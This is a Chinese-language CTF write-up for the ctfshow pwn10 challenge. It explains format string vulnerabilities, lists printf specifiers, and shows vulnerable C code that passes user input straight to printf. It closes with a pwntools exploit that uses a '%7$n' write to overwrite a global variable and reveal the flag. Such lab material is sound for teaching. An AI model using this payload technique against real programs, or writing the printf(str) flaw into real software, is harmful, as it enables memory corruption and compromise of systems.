ctfshow—pwn10

格式化字符串漏洞

具体什么是格式化字符串请大家参考如下文章

https://wiki.x10sec.org/pwn/fmtstr/fmtstr_intro/

printf函数格式化输出符号及详细说明

原文地址：https://blog.csdn.net/xiexievv/article/details/6831194
%a  浮点数、十六进制数字和p-记数法（c99
%A  浮点数、十六进制数字和p-记法（c99）
%c  一个字符(char)
%C  一个ISO宽字符
%d  有符号十进制整数(int)（%ld、%Ld：长整型数据(long),%hd：输出短整形。）　
%e  浮点数、e-记数法
%E  浮点数、E-记数法
%f  单精度浮点数(默认float)、十进制记数法（%.nf  这里n表示精确到小数位后n位.十进制计数）
%g  根据数值不同自动选择%f或%e．
%G  根据数值不同自动选择%f或%e.
%i  有符号十进制数（与%d相同）
%n：将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置
%o  无符号八进制整数
%p  指针
%s  对应字符串char*（%s = %hs = %hS 输出 窄字符）
%S  对应宽字符串WCAHR*（%ws = %S 输出宽字符串）
%u  无符号十进制整数(unsigned int)
%x  使用十六进制数字0xf的无符号十六进制整数　
%X  使用十六进制数字0xf的无符号十六进制整数
%%  打印一个百分号
%I64d 用于INT64 或者 long long
%I64u 用于UINT64 或者 unsigned long long
%I64x 用于64位16进制数据
%m.n : m指域宽，即对应的输出项在输出设备上所占的字符数。n指精度。用于说明输出的实型数的小数位数。为指定n时，隐含的精度为n=6位。
l 对整型指long型，对实型指double型。h用于将整型的格式字符修正为short型。

题目源码

#include <stdio.h>
int num = 0;
int main() {
	setvbuf(stdin, 0, 1, 0);
	setvbuf(stdout, 0, 2, 0);
	char str[100];
	printf("try pwn me?\n");
	scanf("%s", str);
	printf(str);
	if (num == 16)
	{
		system("cat flag");
	}
	else
	{
		printf("You may need to keep learning！");
	}
	return 0;
}

解题

分析

定义了一个全局变量num
str存在溢出
只有一个格式化字符串漏洞
利用漏洞更改num的数值
最终达到输出flag的目的

测试偏移量

可以得到偏移量为7

编写脚本

from pwn import *

p = remote('124.156.121.112',28053)
#p = process("./pwn10")
num_addr = 0x0804A030
payload = p32(num_addr)+"aaaaaaaaaaaa%7$n"
p.sendline(payload)
p.interactive()

测试